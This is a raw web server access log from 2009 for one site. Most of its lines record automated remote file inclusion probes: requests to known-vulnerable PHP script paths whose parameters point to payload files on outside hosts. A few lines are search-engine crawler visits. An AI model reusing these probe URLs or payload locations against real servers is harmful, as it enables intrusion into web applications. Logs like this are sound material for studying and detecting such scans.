70.87.64.234 - - [01/Dec/2009:08:35:09 -0800] "GET /logs/access_090501.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:35:09 -0800] "GET /logs//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:08:36:56 -0800] "GET /logs/access_090801.log%20%20//error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:38:02 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:38:28 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:38:28 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:38:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:38:43 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:39:01 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:08:39:24 -0800] "GET /logs/access_090501.log%20%20//error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:39:57 -0800] "GET /logs/access_090801.log%20%20//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:40:13 -0800] "GET /logs/access_090801.log%20%20//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:41:33 -0800] "GET /logs/access_090501.log%20%20//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:41:36 -0800] "GET /logs/access_090501.log%20%20//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.47.80.37 - - [01/Dec/2009:08:41:56 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:44:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:44:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:44:46 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
189.30.242.61 - - [01/Dec/2009:08:44:57 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:08:45:32 -0800] "GET /logs/access_090801.log//error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:45:44 -0800] "GET /logs/access_090801.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:46:35 -0800] "GET /logs/access_090501.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:46:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:46:35 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:46:52 -0800] "GET /logs/access_090801.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:46:52 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:46:52 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:48:02 -0800] "GET /logs/access_090801.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:48:08 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:48:08 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:08:48:11 -0800] "GET /logs/access_090501.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:36 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:36 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:37 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:39 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:39 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:08:49:39 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:08:51:26 -0800] "GET /logs/access_090531.log/main.php?_shop_path=http://www.tayva.com/catalog/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:08:51:26 -0800] "GET /logs/main.php?_shop_path=http://www.tayva.com/catalog/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:08:51:26 -0800] "GET /main.php?_shop_path=http://www.tayva.com/catalog/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:52:06 -0800] "GET /logs/access_090731.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [01/Dec/2009:08:52:06 -0800] "GET /logs//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [01/Dec/2009:08:52:06 -0800] "GET /error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [01/Dec/2009:08:52:06 -0800] "GET /logs/access_090801.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.54 - - [01/Dec/2009:08:52:26 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
70.87.64.234 - - [01/Dec/2009:08:53:00 -0800] "GET /logs/access_090731.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:08:53:00 -0800] "GET /logs//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:08:53:00 -0800] "GET /error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:08:53:27 -0800] "GET /logs/access_090801.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.22.119.110 - - [01/Dec/2009:08:55:58 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
64.22.119.110 - - [01/Dec/2009:08:55:58 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
64.22.119.110 - - [01/Dec/2009:08:55:58 -0800] "GET /logs/access_090801.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
67.195.112.187 - - [01/Dec/2009:08:58:59 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
201.218.228.226 - - [01/Dec/2009:09:00:39 -0800] "GET ///////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "www.wirama.com"
201.218.228.226 - - [01/Dec/2009:09:00:39 -0800] "GET /logs/access_090330.log%20%20////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.218.228.226 - - [01/Dec/2009:09:00:39 -0800] "GET /logs////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 200 3523 "-" "Mozilla/5.0" "www.wirama.com"
211.193.106.56 - - [01/Dec/2009:09:01:30 -0800] "GET /mygallerybrowser.php?myPath=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:09:01:30 -0800] "GET /logs/mygallerybrowser.php?myPath=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:09:01:30 -0800] "GET /logs/access.log/mygallerybrowser.php?myPath=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:09:01:53 -0800] "GET /logs/access_090731.log/mygallerybrowser.php?myPath=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.22.119.110 - - [01/Dec/2009:09:02:56 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
64.22.119.110 - - [01/Dec/2009:09:02:56 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:03:10 -0800] "GET /logs/access_090329.log%20%20////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:33 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:33 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:33 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:37 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:37 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:38 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:38 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:38 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:38 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:42 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:42 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:42 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:53 -0800] "GET /logs/access_090731.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:58 -0800] "GET /logs/access_090731.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:04:59 -0800] "GET /logs/access_090731.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:05:16 -0800] "GET /logs/access_090731.log/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:12:43 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:12:43 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:12:43 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:12:57 -0800] "GET /logs/access_090731.log/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.47.80.37 - - [01/Dec/2009:09:13:18 -0800] "GET /?D=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:13:25 -0800] "GET /logs/access_090801.log////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
143.248.137.66 - - [01/Dec/2009:09:13:56 -0800] "GET /errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:13:56 -0800] "GET /logs/access_090401.log/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:13:56 -0800] "GET /logs/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:14:06 -0800] "GET /errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:14:06 -0800] "GET /logs/access_090401.log/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:14:06 -0800] "GET /logs/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:14:34 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:14:34 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:14:37 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
143.248.137.66 - - [01/Dec/2009:09:14:38 -0800] "GET /logs/access_090731.log/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:09:14:48 -0800] "GET /logs/access_090731.log/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:09:14:59 -0800] "GET /errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:09:14:59 -0800] "GET /logs/errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:09:14:59 -0800] "GET /logs/access_090401.log/errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:05 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:05 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:05 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:09:15:13 -0800] "GET /logs/access_090731.log/errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [01/Dec/2009:09:15:14 -0800] "GET /logs//template/album.php?SECURITY_FILE=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [01/Dec/2009:09:15:14 -0800] "GET /template/album.php?SECURITY_FILE=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [01/Dec/2009:09:15:15 -0800] "GET /logs/access_090731.log//template/album.php?SECURITY_FILE=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:22 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:22 -0800] "GET /errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:09:15:22 -0800] "GET /logs/errors.php?error=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.218.228.226 - - [01/Dec/2009:09:17:49 -0800] "GET /logs/access_090330.log////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:09:18:59 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:09:18:59 -0800] "GET /logs/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:09:18:59 -0800] "GET /errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.218.228.226 - - [01/Dec/2009:09:21:30 -0800] "GET /logs////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 200 3523 "-" "Mozilla/5.0" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:21:30 -0800] "GET ///////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:21:30 -0800] "GET /logs/access_090801.log////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:21:30 -0800] "GET /logs/access_090401.log////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.31.183 - - [01/Dec/2009:09:22:35 -0800] "GET /logs/access_090501.log/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.251.214.26 - - [01/Dec/2009:09:24:09 -0800] "GET /logs/access_090501.log/index.php?phpbb_root_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [01/Dec/2009:09:24:09 -0800] "GET /logs/index.php?phpbb_root_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [01/Dec/2009:09:24:09 -0800] "GET /index.php?phpbb_root_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.218.228.226 - - [01/Dec/2009:09:26:00 -0800] "GET /logs/access_090329.log////////?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.251.214.26 - - [01/Dec/2009:09:28:55 -0800] "GET /logs/access_090731.log/index.php?phpbb_root_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.102 - - [01/Dec/2009:09:36:56 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
209.97.212.185 - - [01/Dec/2009:09:41:26 -0800] "GET /logs/access_090329.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:41:26 -0800] "GET /logs/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:41:26 -0800] "GET /?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:42:41 -0800] "GET /?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:42:41 -0800] "GET /logs/access_090329.log%20%20/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
